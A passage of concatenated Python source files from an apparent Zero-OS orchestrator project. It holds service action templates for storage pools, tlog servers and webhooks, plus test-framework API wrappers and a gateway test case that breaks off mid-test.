break
time.sleep(1)
else:
job.logger.info("Could not wait within 10 seconds for node to reboot")
service._recurring_tasks['monitor'].start()
def uninstall(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
stats_collector_service = get_stats_collector(service)
if stats_collector_service:
stats_collector_service.executeAction('uninstall', context=job.context)
statsdb_service = get_statsdb(service)
if statsdb_service and str(statsdb_service.parent) == str(service):
statsdb_service.executeAction('uninstall', context=job.context)
bootstraps = service.aysrepo.servicesFind(actor='bootstrap.zero-os')
if bootstraps:
bootstraps[0].executeAction('delete_node', args={'node_name': service.name})
# Remove etcd_cluster if this was the last node service
node_services = service.aysrepo.servicesFind(role='node')
if len(node_services) > 1:
return
for etcd_cluster_service in service.aysrepo.servicesFind(role='etcd_cluster'):
etcd_cluster_service.executeAction('delete', context=job.context)
etcd_cluster_service.delete()
def watchdog(job):
from zeroos.orchestrator.sal.Pubsub import Pubsub
from zeroos.orchestrator.configuration import get_jwt_token
from asyncio import sleep
import asyncio
import re
import traceback
service = job.service
watched_roles = {
'nbdserver': {
'level': 20,
'message': (re.compile('.*'),),
'eof': True
},
'tlogserver': {
'eof': True,
},
'ork': {
'level': 20,
'instance': job.service.name,
'service': 'node',
'eof': False,
'message': (re.compile('.*'),),
'handler': 'ork_handler',
},
'kvm': {
'level': 20,
'instance': job.service.name,
'service': 'node',
'eof': False,
'message': (re.compile('.*'),),
'handler': 'vm_handler',
'sub_id': 'events',
},
'cloudinit': {
'eof': True,
},
'http': {
'eof': True,
},
'dhcp': {
'eof': True,
},
'storage_engine': {
'eof': True,
},
"etcd": {
"eof": True,
},
'stats_collector': {
'eof': True,
},
'zerostor': {
'eof': True,
},
'container': {
"eof": True,
},
}
async def callback(jobid, level, message, flag):
if '.' not in jobid:
return
role, sub_id = jobid.split('.', 1)
if (role not in watched_roles or
watched_roles[role].get('level', level) != level
or watched_roles[role].get('sub_id', sub_id) != sub_id):
return
service_role = watched_roles[role].get('service', role)
instance = watched_roles[role].get('instance', sub_id)
eof = flag & 0x6 != 0
valid_message = False
matched_messages = watched_roles[role].get('message', ())
for msg in matched_messages:
if msg.match(message):
valid_message = True
if not valid_message and not (watched_roles[role]['eof'] and eof):
return
srv = service.aysrepo.serviceGet(role=service_role, instance=instance, die=False)
if srv:
args = {'message': message, 'eof': eof, 'level': level}
job.context['token'] = get_jwt_token(job.service.aysrepo)
handler = watched_roles[role].get('handler', 'watchdog_handler')
await srv.asyncExecuteAction(handler, context=job.context, args=args)
async def check_node(job):
job.context['token'] = get_jwt_token(job.service.aysrepo)
try:
cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)
await cl.ping()
service.model.data.status = 'running'
except (RuntimeError, OSError) as e:
service.model.data.status = 'halted'
async def streaming(job):
# Check if the node is runing
while service.model.actionsState['install'] != 'ok':
await sleep(5)
while str(service.model.data.status) != 'running':
await sleep(5)
# Add the looping here instead of the pubsub sal
cl = None
subscribed = None
while True:
if str(service.model.data.status) != 'running':
await sleep(5)
continue
if cl is None:
job.context['token'] = get_jwt_token(job.service.aysrepo)
cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)
try:
if not subscribed:
queue = await cl.subscribe('ays.monitor')
subscribed = True
await cl.global_stream(queue)
except asyncio.TimeoutError as e:
job.logger.error(e)
await check_node(job)
cl = None
subscribed = None
except OSError as e:
job.logger.error(e)
await check_node(job)
cl = None
subscribed = None
except RuntimeError as e:
job.logger.error(e)
await check_node(job)
cl = None
subscribed = None
except Exception as e:
job.logger.error(traceback.format_exc())
await check_node(job)
cl = None
subscribed = None
return streaming(job)
def nic_shutdown(job, message):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
node = Node.from_ays(service, get_jwt_token(service.aysrepo))
interface = message['name']
if interface.startswith('cont'):
container_id = interface.split('-')[0].replace('cont', '')
for container in node.containers.list():
if str(container.id) == container_id:
container_service = service.aysrepo.serviceGet(role='container', instance=container.name)
container_service.model.data.status = 'networkKilled'
container_service.saveAll()
return
else:
vms = node.client.kvm.list()
for vm in vms:
if interface in vm['ifctargets']:
vm_service = service.aysrepo.serviceGet(role='vm', instance=vm['name'])
vm_service.model.data.status = 'networkKilled'
vm_service.saveAll()
return
job.logger.info('Failed to find vm/container interface matching %s' % interface)
def ork_handler(job):
import json
from zeroos.orchestrator.utils import send_event
message = job.model.args.get('message')
if not message:
return
message = json.loads(message)
send_event('ork', message, job.service.aysrepo)
if message['event'] == 'NIC_SHUTDOWN':
nic_shutdown(job, message)
elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'WARNING':
job.logger.info('VM %s exceeded cpu threshold and will be quarantined soon' % message['name'])
elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'SUCCESS':
job.logger.info('Vm %s has been quarantined' % message['name'])
elif message['event'] == 'VM_UNQUARANTINE' and message['state'] == 'SUCCESS':
job.logger.info('Vm %s has been released from quarantine' % message['name'])
def start_vm(job, vm):
import asyncio
from zeroos.orchestrator.configuration import get_jwt_token
if vm.model.data.status == 'running':
job.context['token'] = get_jwt_token(job.service.aysrepo)
asyncio.ensure_future(vm.asyncExecuteAction('start', context=job.context), loop=job.service._loop)
def shutdown_vm(job, vm):
import asyncio
from zeroos.orchestrator.configuration import get_jwt_token
if vm.model.data.status == 'running':
job.context['token'] = get_jwt_token(job.service.aysrepo)
asyncio.ensure_future(vm.asyncExecuteAction('shutdown', context=job.context), loop=job.service._loop)
def vm_handler(job):
import json
import asyncio
message = job.model.args.get('message')
if not message:
return
message = json.loads(message)
vm = job.service.aysrepo.serviceGet(role='vm', instance=message['name'])
if not vm:
return
if message['event'] == 'stopped' and message['detail'] == 'failed':
asyncio.ensure_future(start_vm(job, vm))
if message['event'] == 'stopped' and message['detail'] == 'shutdown':
asyncio.ensure_future(shutdown_vm(job, vm))
def processChange(job):
service = job.service
args = job.model.args
node_data = service.model.data.to_dict()
if 'forceReboot' in args and node_data.get('forceReboot') != args['forceReboot']:
service.model.data.forceReboot = args['forceReboot']
service.saveAll()
```
#### File: templates/storagepool/actions.py
```python
from JumpScaler import j
def input(job):
service = job.service
for notempty in ['metadataProfile', 'dataProfile', 'devices']:
if job.model.args.get(notempty, "") == "":
raise j.exceptions.Input("{} argument cannot be empty, cannot continue init of {}".format(notempty, service))
def install(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
pservice = service.parent
node = Node.from_ays(pservice, job.context['token'])
devices = [d.device for d in service.model.data.devices]
name = service.name
dataProfile = str(service.model.data.dataProfile)
metadataProfile = str(service.model.data.metadataProfile)
mountpoint = str(service.model.data.mountpoint) or None
created = False
try:
pool = node.storagepools.get(name)
except ValueError:
# pool does not exists lets create it
pool = node.storagepools.create(name, devices, metadataProfile, dataProfile, overwrite=True)
created = True
# mount device
# if pool already mounted and user ask a specific mountpoint, remount to the correct location
if pool.mountpoint and mountpoint:
if pool.mountpoint != mountpoint:
pool.umount()
pool.mount(mountpoint)
# if pool already mounted and not specific endpoint asked, do nothing
if pool.mountpoint and not mountpoint:
pass
# if pool not mounted and no mountpoint specified, use automatic mount
elif not pool.mountpoint and not mountpoint:
pool.mount()
# lets check if devices need to be added removed and the profile still matches
if pool.fsinfo['data']['profile'].lower() != dataProfile:
raise RuntimeError("Data profile of storagepool {} does not match".format(name))
if pool.fsinfo['metadata']['profile'].lower() != metadataProfile:
raise RuntimeError("Metadata profile of storagepool {} does not match".format(name))
if not created:
updateDevices(service, pool, devices)
pool.ays.create(service.aysrepo)
def delete(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
pservice = service.parent
node = Node.from_ays(pservice, job.context['token'])
name = service.name
try:
pool = node.storagepools.get(name)
pool.delete(zero=True)
except ValueError:
# pool does not exists, nothing to do
pass
def updateDevices(service, pool, devices):
pooldevices = set(pool.devices)
requireddevices = set(devices)
def in_pool(device):
for pooldevice in pooldevices:
if pooldevice.startswith(device):
return True
return False
def in_devices(pooldevice):
for device in requireddevices:
if pooldevice.startswith(device):
return True
return False
# add extra devices
extradevices = set()
for device in requireddevices:
if not in_pool(device):
extradevices.add(device)
if extradevices:
pool.device_add(*extradevices)
# remove devices
removeddevices = set()
for pooldevice in pooldevices:
if not in_devices(pooldevice):
removeddevices.add(pooldevice)
if removeddevices:
for device in service.model.data.devices:
if device.device in removeddevices:
device.status = 'removing'
pool.device_remove(*removeddevices)
def processChange(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token_from_job
service = job.service
if service.model.actionsState['install'] in ['new', 'scheduled']:
return
args = job.model.args
category = args.pop('changeCategory')
if category == "dataschema":
pservice = service.parent
node = Node.from_ays(pservice, get_jwt_token_from_job(job))
try:
pool = node.storagepools.get(service.name)
devices = [d['device'] for d in args['devices']]
updateDevices(service, pool, devices)
pool.ays.create(service.aysrepo)
except ValueError:
job.logger.error("pool %s doesn't exist, cant update devices", service.name)
def monitor(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
if service.model.actionsState['install'] == 'ok':
pservice = service.parent
token = get_jwt_token(job.service.aysrepo)
node = Node.from_ays(pservice, token)
try:
pool = node.storagepools.get(service.name)
if not pool.mountpoint:
job.context['token'] = token
install(job)
devices, status = pool.get_devices_and_status()
service.model.data.init('devices', len(devices))
for i, device in enumerate(devices):
service.model.data.devices[i] = device
service.model.data.status = status
service.saveAll()
except ValueError:
job.logger.error("pool %s doesn't exist, cant monitor pool", service.name)
```
#### File: templates/tlogserver/actions.py
```python
from js9 import j
def get_container(service, password):
from zeroos.orchestrator.sal.Container import Container
return Container.from_ays(service.parent, password, logger=service.logger)
def is_port_listening(container, port, timeout=30, listen=True):
import time
start = time.time()
while start + timeout > time.time():
if port not in container.node.freeports(port, nrports=3):
return True
if not listen:
return False
time.sleep(0.2)
return False
def is_job_running(container, cmd='/bin/tlogserver'):
try:
for job in container.client.job.list():
arguments = job['cmd']['arguments']
if 'name' in arguments and arguments['name'] == cmd:
return job
return False
except Exception as err:
if str(err).find("invalid container id"):
return False
raise
def save_config(job, vdisks=None):
import yaml
from zeroos.orchestrator.sal.ETCD import EtcdCluster
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
config = {"servers": [service.model.data.bind]}
yamlconfig = yaml.safe_dump(config, default_flow_style=False)
etcd_cluster = service.aysrepo.servicesFind(role='etcd_cluster')[0]
etcd = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
etcd.put(key="%s:cluster:conf:tlog" % service.name, value=yamlconfig)
for vdisk in vdisks:
vdiskstore = vdisk.parent
config = {
"storageClusterID": vdiskstore.model.data.blockCluster,
"tlogServerClusterID": service.name,
"slaveStorageClusterID": vdiskstore.model.data.slaveCluster or "",
}
job.logger.debug("tlogserver %s save config for vdisk %s", service, vdisk)
job.logger.debug(config)
yamlconfig = yaml.safe_dump(config, default_flow_style=False)
etcd.put(key="%s:vdisk:conf:storage:nbd" % vdisk.name, value=yamlconfig)
def install(job):
from zeroos.orchestrator.sal.ETCD import EtcdCluster
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
etcd_cluster = service.aysrepo.servicesFind(role='etcd_cluster')[0]
etcd_cluster = EtcdCluster.from_ays(etcd_cluster, job.context['token'])
vm = service.consumers['vm'][0]
vdisks = vm.producers.get('vdisk', [])
container = get_container(service, job.context['token'])
config = {
'storageClusters': set(),
'data-shards': 0,
'parity-shards': 0,
}
backup = False
for vdiskservice in vdisks:
vdiskstore = vdiskservice.parent
objectcluster = vdiskstore.model.data.objectCluster
if objectcluster and objectcluster not in config['storageClusters']:
data_shards, parity_shards = get_storagecluster_config(job, objectcluster)
config['storageClusters'].add(objectcluster)
config['data-shards'] += data_shards
config['parity-shards'] += parity_shards
if vdiskstore.model.data.slaveCluster:
backup = True
if not config['storageClusters']:
return
save_config(job, vdisks)
data_shards = config.pop('data-shards')
parity_shards = config.pop('parity-shards')
# check if we consume another tlog on which we need to sync at startup
tlogWaitAddr = None
if 'tlogserver' in service.producers:
waitTlogServer_service = service.producers['tlogserver'][0]
tlogWaitAddr = waitTlogServer_service.model.data.waitListenBind
bind = service.model.data.bind
waitListenBind = service.model.data.waitListenBind
if not is_port_listening(container, int(bind.split(':')[1]), listen=False):
cmd = '/bin/tlogserver \
-id {id} \
-flush-size 128 \
-address {bind} \
-wait-listen-addr {waitListenBind} \
-config "{dialstrings}" \
'.format(id=vm.name,
bind=bind,
waitListenBind=waitListenBind,
dialstrings=etcd_cluster.dialstrings)
if backup:
cmd += ' -with-slave-sync'
if tlogWaitAddr:
cmd += ' -wait-connect-addr {}'.format(tlogWaitAddr)
if service.model.data.acceptAddress:
cmd += ' -accept-address {}'.format(service.model.data.acceptAddress)
job.logger.info("Starting tlog server: %s" % cmd)
container.client.system(cmd, id="{}.{}".format(service.model.role, service.name))
if not is_port_listening(container, int(bind.split(":")[1])):
raise j.exceptions.RuntimeError('Failed to start tlogserver {}'.format(service.name))
service.model.data.status = 'running'
service.saveAll()
tcpsrv = service.producers['tcp'][0]
if tcpsrv.model.data.status == "dropped":
tcpsrv.executeAction('install', context=job.context)
def start(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
service.executeAction('install', context=job.context)
def get_storagecluster_config(job, storagecluster):
objectcluster_service = job.service.aysrepo.serviceGet(role='storagecluster.object',
instance=storagecluster)
return objectcluster_service.model.data.dataShards, objectcluster_service.model.data.dataShards
def stop(job):
import time
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
if service.model.data.status != 'running':
return
service.model.data.status = 'halting'
service.saveAll()
container = get_container(service, job.context['token'])
bind = service.model.data.bind
port = int(bind.split(':')[1])
tlogjob = is_job_running(container)
if tlogjob:
job.logger.info("killing job {}".format(tlogjob['cmd']['arguments']['name']))
container.client.job.kill(tlogjob['cmd']['id'])
job.logger.info("wait for tlogserver to stop")
for i in range(60):
time.sleep(1)
if not is_port_listening(container, port):
break
raise j.exceptions.RuntimeError("Failed to stop Tlog server")
# after stop, in case this service was consume by another tlog server for synchronisation
# need to clean the consumer relation cause the sync is done just before stop.
# the relation doesn't need to exists anymore.
for consumer in service.consumers.get('tlogserver', []):
service.model.consumerRemove(consumer)
service.model.data.status = 'halted'
service.saveAll()
tcpsrv = service.producers['tcp'][0]
if tcpsrv.model.data.status == "opened":
tcpsrv.executeAction('drop', context=job.context)
def monitor(job):
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
if not service.model.actionsState['install'] == 'ok':
return
if str(service.model.data.status) != 'running':
return
bind = service.model.data.bind
port = int(bind.split(':')[1])
container = get_container(service, get_jwt_token(job.service.aysrepo))
if is_port_listening(container, port):
return
service.executeAction('start', context={"token": get_jwt_token(job.service.aysrepo)})
def watchdog_handler(job):
import asyncio
loop = j.atyourservice.server.loop
service = job.service
if str(service.model.data.status) != 'running':
return
eof = job.model.args['eof']
if eof:
asyncio.ensure_future(service.asyncExecuteAction('start', context=job.context), loop=loop)
```
#### File: templates/webhook/actions.py
```python
def processChange(job):
service = job.service
args = job.model.args
if args.pop('changeCategory') != 'dataschema':
return
if 'url' in args:
service.model.data.url = args['url']
if 'eventtypes' in args:
service.model.data.eventtypes = args['eventtypes']
service.saveAll()
```
#### File: framework/orchestrator_apis/bridges_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
import random
class BridgesAPI(OrchestratorBase):
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
self.createdbridges = []
@catch_exception_decoration
def get_nodes_bridges(self, nodeid):
return self.orchestrator_client.nodes.ListBridges(nodeid=nodeid)
@catch_exception_decoration
def get_nodes_bridges_bridgeid(self, nodeid, bridgeid):
return self.orchestrator_client.nodes.GetBridge(nodeid=nodeid, bridgeid=bridgeid)
@catch_exception_decoration_return
def post_nodes_bridges(self, node_id, **kwargs):
temp = random.randint(1, 254)
temp2 = random.randint(1, 254)
if 'networkMode' not in kwargs.keys():
kwargs['networkMode'] = self.random_choise(["none", "static", "dnsmasq"])
settings_draft = {"none": {},
"static": {"cidr": "192.%i.%i.%i/24" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))},
"dnsmasq": {"cidr": "192.%i.%i.1/24" % (temp, temp2),
"start": "192.%i.%i.2" % (temp, temp2),
"end": "192.%i.%i.254" % (temp, temp2)}}
data = {"name": self.random_string(),
"hwaddr": self.randomMAC(),
"networkMode": kwargs['networkMode'],
"nat": self.random_choise(([False, True])),
"setting": settings_draft[kwargs['networkMode']]
}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateBridge(nodeid=node_id,
data=data)
if response.status_code == 201:
self.createdbridges.append({"node": node_id, "name": data["name"]})
return response, data
@catch_exception_decoration
def delete_nodes_bridges_bridgeid(self, nodeid, bridgeid):
response = self.orchestrator_client.nodes.DeleteBridge(nodeid=nodeid, bridgeid=bridgeid)
if response.status_code == 204:
self.createdbridges.remove({"node": nodeid, "name": bridgeid})
return response
```
#### File: framework/orchestrator_apis/health_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
class HealthcheckAPI:
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
@catch_exception_decoration
def get_all_nodes_health(self):
return self.orchestrator_client.health.ListNodesHealth()
@catch_exception_decoration
def get_node_health(self, nodeid):
return self.orchestrator_client.health.ListNodeHealth(nodeid=nodeid)
@catch_exception_decoration
def get_storageclusters_health(self):
return self.orchestrator_client.health.ListStorageClustersHealth()
@catch_exception_decoration
def get_storagecluster_health(self, storageclusterid):
return self.orchestrator_client.health.ListStorageClusterHealth(storageclusterid=storageclusterid)
```
#### File: framework/orchestrator_apis/storageclusters_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
class Storageclusters(OrchestratorBase):
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
@catch_exception_decoration_return
def post_storageclusters(self, nodes, **kwargs):
data = {
"label": self.random_string(),
"servers": 1,
"driveType": 'ssd',
"clusterType": "block",
"nodes": nodes
}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.storageclusters.DeployNewCluster(data=data)
return response, data
@catch_exception_decoration
def get_storageclusters(self):
return self.orchestrator_client.storageclusters.ListAllClusters()
@catch_exception_decoration
def get_storageclusters_label(self, label):
return self.orchestrator_client.storageclusters.GetClusterInfo(label=label)
@catch_exception_decoration
def delete_storageclusters_label(self, label):
return self.orchestrator_client.storageclusters.KillCluster(label=label)
```
#### File: framework/orchestrator_apis/storagepools_apis.py
```python
from framework.orchestrator_apis import *
from framework.orchestrator_base import OrchestratorBase
import random
class StoragepoolsAPI(OrchestratorBase):
def __init__(self, orchestrator_driver):
self.orchestrator_driver = orchestrator_driver
self.orchestrator_client = self.orchestrator_driver.orchestrator_client
@catch_exception_decoration
def get_storagepools(self, nodeid):
return self.orchestrator_client.nodes.ListStoragePools(nodeid=nodeid)
@catch_exception_decoration_return
def post_storagepools(self, node_id, free_devices, **kwargs):
data = {"name": self.random_string(),
"metadataProfile": 'single',
"dataProfile": 'single',
"devices": [random.choice(free_devices)]}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateStoragePool(nodeid=node_id, data=data)
return response, data
@catch_exception_decoration
def get_storagepools_storagepoolname(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.GetStoragePoolInfo(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration
def delete_storagepools_storagepoolname(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.DeleteStoragePool(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration
def get_storagepools_storagepoolname_devices(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.ListStoragePoolDevices(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration
def post_storagepools_storagepoolname_devices(self, nodeid, storagepoolname, data):
return self.orchestrator_client.nodes.CreateStoragePoolDevices(nodeid=nodeid, storagepoolname=storagepoolname,
data=data)
@catch_exception_decoration
def get_storagepools_storagepoolname_devices_deviceid(self, nodeid, storagepoolname, deviceuuid):
return self.orchestrator_client.nodes.GetStoragePoolDeviceInfo(nodeid=nodeid, storagepoolname=storagepoolname,
deviceuuid=deviceuuid)
@catch_exception_decoration
def delete_storagepools_storagepoolname_devices_deviceid(self, nodeid, storagepoolname, deviceuuid):
return self.orchestrator_client.nodes.DeleteStoragePoolDevice(nodeid=nodeid, storagepoolname=storagepoolname,
deviceuuid=deviceuuid)
@catch_exception_decoration
def get_storagepools_storagepoolname_filesystems(self, nodeid, storagepoolname):
return self.orchestrator_client.nodes.ListFilesystems(nodeid=nodeid, storagepoolname=storagepoolname)
@catch_exception_decoration_return
def post_storagepools_storagepoolname_filesystems(self, node_id, storagepoolname, **kwargs):
data = {"name": self.random_string(),
"quota": random.randint(0, 10),
"readOnly": False}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateFilesystem(nodeid=node_id, storagepoolname=storagepoolname,
data=data)
return response, data
@catch_exception_decoration
def get_storagepools_storagepoolname_filesystems_filesystemname(self, nodeid, storagepoolname, filesystemname):
return self.orchestrator_client.nodes.GetFilesystemInfo(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname)
@catch_exception_decoration
def delete_storagepools_storagepoolname_filesystems_filesystemname(self, nodeid, storagepoolname, filesystemname):
return self.orchestrator_client.nodes.DeleteFilesystem(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname)
@catch_exception_decoration
def get_filesystem_snapshots(self, nodeid, storagepoolname, filesystemname):
return self.orchestrator_client.nodes.ListFilesystemSnapshots(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname)
@catch_exception_decoration_return
def post_filesystems_snapshots(self, nodeid, storagepoolname, filesystemname, **kwargs):
data = {'name': self.random_string()}
data = self.update_default_data(default_data=data, new_data=kwargs)
response = self.orchestrator_client.nodes.CreateSnapshot(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
data=data)
return response, data
@catch_exception_decoration
def get_filesystem_snapshots_snapshotname(self, nodeid, storagepoolname, filesystemname, snapshotname):
return self.orchestrator_client.nodes.GetFilesystemSnapshotInfo(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
snapshotname=snapshotname)
@catch_exception_decoration
def delete_filesystem_snapshots_snapshotname(self, nodeid, storagepoolname, filesystemname, snapshotname):
return self.orchestrator_client.nodes.DeleteFilesystemSnapshot(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
snapshotname=snapshotname)
@catch_exception_decoration
def post_filesystem_snapshots_snapshotname_rollback(self, nodeid, storagepoolname, filesystemname, snapshotname,
data={}):
return self.orchestrator_client.nodes.RollbackFilesystemSnapshot(nodeid=nodeid, storagepoolname=storagepoolname,
filesystemname=filesystemname,
snapshotname=snapshotname,
data=data)
```
#### File: test_suite/framework/orchestrator_driver.py
```python
from framework.orchestrator_apis.bridges_apis import BridgesAPI
from framework.orchestrator_apis.containers_apis import ContainersAPI
from framework.orchestrator_apis.gateways_apis import GatewayAPI
from framework.orchestrator_apis.nodes_apis import NodesAPI
from framework.orchestrator_apis.storageclusters_apis import Storageclusters
from framework.orchestrator_apis.storagepools_apis import StoragepoolsAPI
from framework.orchestrator_apis.vms_apis import VmsAPI
from framework.orchestrator_apis.vdisks_apis import VDisksAPIs
from framework.orchestrator_apis.health_apis import HealthcheckAPI
from framework.orchestrator_apis.zerotiers_apis import ZerotiersAPI
from framework.orchestrator_apis.backup_apis import BackupAPI
from framework.orchestrator_apis.graphs_apis import GraphsAPI
from zeroos.orchestrator import client
from testconfig import config
class OrchasteratorDriver:
api_base_url = config['main']['api_base_url']
client_id = config['main']['client_id']
client_secret = config['main']['client_secret']
organization = config['main']['organization']
zerotier_token = config['main']['zerotier_token']
vm_username = config['main']['vm_username']
vm_password = config['main']['vm_password']
def __init__(self):
self.JWT = None
self.orchestrator_client = client.APIClient(self.api_base_url)
self.refresh_jwt()
self.bridges_api = BridgesAPI(self)
self.container_api = ContainersAPI(self)
self.gateway_api = GatewayAPI(self)
self.nodes_api = NodesAPI(self)
self.storagepools_api = StoragepoolsAPI(self)
self.storageclusters_api = Storageclusters(self)
self.vdisks_api = VDisksAPIs(self)
self.vms_api = VmsAPI(self)
self.zerotiers_api = ZerotiersAPI(self)
self.backup_api = BackupAPI(self)
self.healthcheck_api = HealthcheckAPI(self)
self.graph_apis = GraphsAPI(self)
self.nodes_info = self.get_node_info()
def get_jwt(self):
auth = client.oauth2_client_itsyouonline.Oauth2ClientItsyouonline()
response = auth.get_access_token(self.client_id, self.client_secret,
scopes=['user:memberof:%s' % self.organization],
audiences=[])
return response.content.decode('utf-8')
def refresh_jwt(self):
self.JWT = self.get_jwt()
self.orchestrator_client.set_auth_header("Bearer %s" % self.JWT)
def get_node_info(self):
nodes_info = []
response = self.nodes_api.get_nodes()
for node in response.json():
if node['status'] == 'halted':
continue
nodes_info.append({"id": node['id'],
"ip": node['ipaddress'],
"status": node['status'],
"hostname":node['hostname']})
return nodes_info
```
#### File: testcases/advanced_tests/test03_gws_apis.py
```python
import random, time
from testcases.testcases_base import TestcasesBase
import unittest
class TestGatewayAPICreation(TestcasesBase):
def setUp(self):
super().setUp()
self.core0_client.create_ovs_container()
self.core0_client.timeout = 30
self.flist = 'https://hub.gig.tech/gig-official-apps/ubuntu1604.flist'
self.container_body = {"name": self.rand_str(),
"hostname": self.rand_str(),
"flist": self.flist}
def tearDown(self):
self.lg.info(' [*] Delete all created {} gateways'.format(self.nodeid))
attributes = self.__dict__.keys()
if 'data' in attributes:
if self.data:
self.gateways_api.delete_nodes_gateway(self.nodeid, self.data['name'])
self.lg.info(' [*] TearDown:delete all created container ')
if 'container_data' in attributes:
if self.container_data:
self.containers_api.delete_containers_containerid(self.nodeid,
self.container_data['name'])
self.lg.info(' [*] TearDown:delete all created bridges ')
if 'bridge_data' in attributes:
if self.bridge_data:
self.bridges_api.delete_nodes_bridges_bridgeid(self.nodeid,
self.bridge_data['name'])
super().tearDown()
def create_vm(self, nics):
response = self.storageclusters_api.get_storageclusters()
self.assertEqual(response.status_code, 200)
storageclusters = response.json()
if storageclusters:
storagecluster = storageclusters[-1]
else:
free_disks = self.core0_client.getFreeDisks()
if free_disks == []:
self.skipTest(' [*] no free disks to create storagecluster.')
self.lg.info(' [*] Deploy new storage cluster (SC0).')
response, data = self.storageclusters_api.post_storageclusters(node_id=self.nodeid)
self.assertEqual(response.status_code, 201)
storagecluster = data['label']
self.lg.info(' [*] Create new vdisk.')
response, data = self.vdisks_api.post_vdisks(storagecluster=storagecluster, size=15, blocksize=4096, type='boot')
boot_disk = data['id']
self.lg.info(' [*] Create virtual machine (VM0) on node (N0)')
disks = [{"vdiskid": boot_disk, "maxIOps": 2000}]
response, data = self.vms_api.post_nodes_vms(node_id=self.nodeid, memory=1024, cpu=1, nics=nics, disks=disks)
self.assertEqual(response.status_code, 201)
return data
def test001_create_gateway_with_xlan_xlan_container(self):
""" GAT-123
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with Xlan and Xlan as nics on node (N0), should succeed.
#. Bind a new container to Xlan(1).
#. Bind a new container to Xlan(2).
#. Make sure that those two containers can ping each others.
"""
self.lg.info(' [*] Create gateway with xlan as nics on node (N0), should succeed')
nics_type = [{
'type': random.choice(['vlan', 'vxlan']),
'gateway': True,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
self.lg.info(' [*] Bind a new container to vlan(1)')
nics_container = [{'type': nics[1]['type'],
'id': nics[1]['id'],
'config': {'dhcp': False,
'gateway': nics[1]['config']['cidr'][:-3],
'cidr': nics[1]['config']['cidr'][:-4] + '10/24'}
}]
uid_1 = self.core0_client.client.container.create(self.flist, nics=nics_container).get()
container_1 = self.core0_client.client.container.client(int(uid_1))
self.lg.info(' [*] Bind a new container to vlan(2)')
nics_container = [{'type': nics[2]['type'],
'id': nics[2]['id'],
'config': {'dhcp': False,
'gateway': nics[2]['config']['cidr'][:-3],
'cidr': nics[2]['config']['cidr'][:-4] + '10/24'}
}]
uid = self.core0_client.client.container.create(self.flist, nics=nics_container).get()
container_2 = self.core0_client.client.container.client(int(uid))
time.sleep(5)
self.lg.info(' [*] Make sure that those two containers can ping each others')
response = container_1.bash('ping -w5 %s' % nics[2]['config']['cidr'][:-4] + '10').get()
self.assertEqual(response.state, 'SUCCESS')
response = container_2.bash('ping -w5 %s' % nics[1]['config']['cidr'][:-4] + '10').get()
